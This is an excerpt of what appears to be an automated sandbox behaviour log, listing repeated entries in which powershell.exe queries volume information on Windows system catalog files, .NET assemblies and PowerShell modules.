                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
